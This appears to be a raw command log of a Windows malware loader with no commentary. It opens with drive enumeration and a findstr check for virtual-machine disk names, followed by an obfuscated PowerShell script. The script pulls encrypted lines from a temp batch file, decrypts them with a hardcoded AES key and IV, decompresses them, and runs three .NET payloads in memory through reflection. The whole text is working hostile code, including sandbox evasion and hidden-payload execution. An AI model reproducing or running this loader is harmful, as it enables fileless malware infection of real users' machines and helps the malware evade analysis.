fsutil fsinfo drives

findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"

cmd.exe /c echo function FsWr($xGUa){ Invoke-Expression -Debug -Verbose -InformationAction Ignore '$gOXE=[QxSQxysQxtQxemQx.QxSQxeQxcQxurQxiQxtyQx.QxCQxryQxptQxoQxgQxrQxapQxhQxyQx.AQxeQxs]Qx::QxCQxrQxeQxaQxtQxe(Qx);'.Replace('Qx', ''); Invoke-Expression -Verbose '$gOXE.Mkkokkdekk=kk[Skkykkskktkkekkm.kkSkkeckkukkrkkitkky.kkCkkrkkykkptkkokkgkkrakkpkkhykk.CkkikkpkkhkkekkrkkMokkdkke]kk:kk:kkCkkBkkCkk;'.Replace('kk', ''); Invoke-Expression -Debug -WarningAction Inquire '$gOXE.Ptfatfddtfitfngtf=tf[tfStfytfsttfetfm.tfStfetfcutfritfttfytf.tfCrtfytfptftotfgtfratfphtfytf.tfPtfatfdtfditfntfgMtfotfdtfetf]tf:tf:tfPKtfCStf7;'.Replace('tf', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire -Verbose '$gOXE.KmGemGy=mG[mGSymGsmGtmGemGmmG.CmGomGnvmGemGrmGt]mG::mGFmGrmGomGmBmGamGsmGe6mG4mGStmGrimGnmGg("VmGbmGv6mG2mGUzmGUmGLmGRmGsmGbrmGEmG/VmG1mGEmG4amGfOmGTmGOmGomGTXmGrmGcmGtfmGymGn0mG4CmGFmG7mGQmG9mGBmGTYmG=");'.Replace('mG', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire -Verbose '$gOXE.IqfVqf=[qfSqfysqftqfeqfmqf.qfCoqfnqfveqfrqftqf]:qf:FqfrqfoqfmqfBaqfsqfeqf64qfSqftrqfinqfgqf("RqfQqfFSqfgqfPSqf3qfSqfJqfyqfvaqfCqfmiqfSqfPqfZZqfHgqf=qf=qf");'.Replace('qf', ''); $NVYr=$gOXE.CreateDecryptor(); $UBWD=$NVYr.TransformFinalBlock($xGUa, 0, $xGUa.Length); $NVYr.Dispose(); $gOXE.Dispose(); $UBWD;}function Yaio($xGUa){ Invoke-Expression -WarningAction Inquire -Debug -Verbose '$IYhN=NDneDnw-DnODnbjDneDncDntDn DnSyDnsDnteDnmDn.DnIODn.MDneDnmDnoDnryDnSDntDnreDnaDnm(,$xGUa);'.Replace('Dn', ''); Invoke-Expression -WarningAction Inquire -Verbose -InformationAction Ignore '$Uihs=NDneDnw-DnODnbjDneDncDntDn DnSyDnsDnteDnmDn.DnIODn.MDneDnmDnoDnryDnSDntDnreDnaDnm;'.Replace('Dn', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$LgWg=NrWerWw-rWOrWbjrWerWcrWtrW rWSyrWsrWterWmrW.rWIOrW.CrWorWmrWprWrerWsrWsrWiorWnrW.GrWZirWprWSrWtrWrrWerWamrW($IYhN, [rWIrWO.rWCrWomrWprWrrWerWsrWsirWorWn.rWCrWorWmprWrerWsrWsrWirWonrWMrWorWderW]rW::rWDerWcrWorWmrWprWrrWesrWs);'.Replace('rW', ''); $LgWg.CopyTo($Uihs); $LgWg.Dispose(); $IYhN.Dispose(); $Uihs.Dispose(); $Uihs.ToArray();}function Grlp($xGUa,$CaYk){ Invoke-Expression -Debug -Verbose -InformationAction Ignore '$vavo=[BwSBwysBwtBwemBw.BwRBweBwfBwleBwcBwtiBwoBwnBw.ABwssBweBwmBwbBwlyBw]Bw:Bw:LBwoBwadBw([byte[]]$xGUa);'.Replace('Bw', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$ZxPG=$vavo.EbnnbntrbnybnPobnibnnbnt;'.Replace('bn', ''); Invoke-Expression -WarningAction Inquire -Verbose -InformationAction Ignore -Debug '$ZxPG.PVIPVnvPVoPVkePV(PV$PVnPVuPVllPV, $CaYk);'.Replace('PV', '');}$dqke = 'C:\Users\Admin\AppData\Local\Temp\hi.bat';$host.UI.RawUI.WindowTitle = $dqke;$GSXe=[System.IO.File]::ReadAllText($dqke).Split([Environment]::NewLine);foreach ($iKVq in $GSXe) { if ($iKVq.StartsWith('jOngn')) { $dnev=$iKVq.Substring(5); break; }}$JfeN=[string[]]$dnev.Split('\');Invoke-Expression -Verbose -Debug -InformationAction Ignore '$ait = Yaio (FsWr ([PcCPconPcvPcerPctPc]Pc:Pc:PcFrPcoPcmBPcaPcsPce6Pc4SPctPcrPciPcngPc($JfeN[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Pc', '');Invoke-Expression -InformationAction Ignore '$fiw = Yaio (FsWr ([PcCPconPcvPcerPctPc]Pc:Pc:PcFrPcoPcmBPcaPcsPce6Pc4SPctPcrPciPcngPc($JfeN[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Pc', '');Invoke-Expression -Debug -InformationAction Ignore '$kyK = Yaio (FsWr ([PcCPconPcvPcerPctPc]Pc:Pc:PcFrPcoPcmBPcaPcsPce6Pc4SPctPcrPciPcngPc($JfeN[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Pc', '');Grlp $ait $null;Grlp $fiw $null;Grlp $kyK (,[string[]] (''));